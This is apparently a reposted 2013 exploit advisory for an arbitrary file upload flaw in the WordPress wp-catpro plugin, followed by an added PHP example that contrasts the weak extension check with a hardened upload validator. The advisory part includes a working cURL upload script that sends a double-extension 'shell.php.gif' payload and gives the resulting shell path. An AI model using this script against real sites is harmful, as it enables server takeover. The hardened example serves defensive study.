WordPress plugin wp-catpro arbitrary file upload
Thread starter (楼主), posted on 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on: Windows 7, Backtrack 5r3
Download: http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Upload script as posted: sends a file whose last extension passes the plugin's allow-list
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

// Content of the uploaded file (zik.php.gif):
<?php
phpinfo();
?>
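Added example, not code from the original post or from the wp-catpro plugin: the weak last-extension check the advisory describes, beside a hardened version of the same server-side check. The hardened function rejects any name with more than one dot (so the advisory's zik.php.gif is refused), requires the extension to be in the allow-list, verifies the file's real content type with PHP's fileinfo extension instead of trusting the client, ignores the client-supplied folder, and stores the file under a server-generated random name. The function names, the allow-list, the upload directory and the two sample inputs are assumptions constructed for this example.

```php
<?php
// Added example (not code from the original post or from the wp-catpro
// plugin). Two versions of the server-side filename check for an image
// upload endpoint such as the one in the advisory above.

// Weak check, as the advisory describes it: only the last extension is
// compared with the allow-list, so "zik.php.gif" is accepted. On Apache
// with mod_php's AddHandler directive every dot-separated segment counts
// as an extension, so such a file can be executed as PHP.
function weak_is_allowed(string $name): bool
{
    $allowed = ['jpg', 'gif', 'png'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// Hardened check (hypothetical helper written for this example):
//  - exactly one dot, a short base name, and a conservative character set;
//  - extension must be in the allow-list;
//  - the file's real content type (via the fileinfo extension) must match
//    the extension, not the client's Content-Type claim;
//  - the client-supplied name and folder are discarded: the stored name is
//    random and the target directory is fixed server-side.
function hardened_store_name(string $name, string $tmpPath, ?string &$error = null): ?string
{
    $allowed = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'gif'  => 'image/gif',
        'png'  => 'image/png',
    ];
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
        $error = 'name has extra dots, disallowed characters, or is too long';
        return null;
    }
    $ext = strtolower($m[1]);
    if (!isset($allowed[$ext])) {
        $error = "extension .$ext is not in the allow-list";
        return null;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime !== $allowed[$ext]) {
        $error = "content type $mime does not match .$ext";
        return null;
    }
    // Server-chosen name: the uploader never controls what is written to disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Fixed upload directory, never taken from the request (unlike the
// 'folder' POST field the exploit sends). Assumed path for the example.
const UPLOAD_DIR = '/var/www/uploads/catpro';

// Constructed inputs: the advisory's payload name with PHP content, and a
// tiny real GIF.
$cases = [
    ['zik.php.gif', "<?php phpinfo(); ?>"],
    ['photo.gif',   "GIF89a\x01\x00\x01\x00\x00\x00\x00;"],
];
foreach ($cases as [$name, $content]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $content);
    $err    = null;
    $stored = hardened_store_name($name, $tmp, $err);
    printf("%-12s weak: %-6s hardened: %s\n",
        $name,
        weak_is_allowed($name) ? 'allow' : 'reject',
        $stored === null ? "reject ($err)" : "store as " . UPLOAD_DIR . "/$stored");
    unlink($tmp);
}
```

Run with `php example.php`: zik.php.gif is allowed by the weak check and rejected by the hardened one for its extra dot, while photo.gif is stored under a random name. Independently of the filename check, the upload directory should be served with script execution disabled (for example, no PHP handler for that path) so that a file which slips past validation is still only delivered as static content.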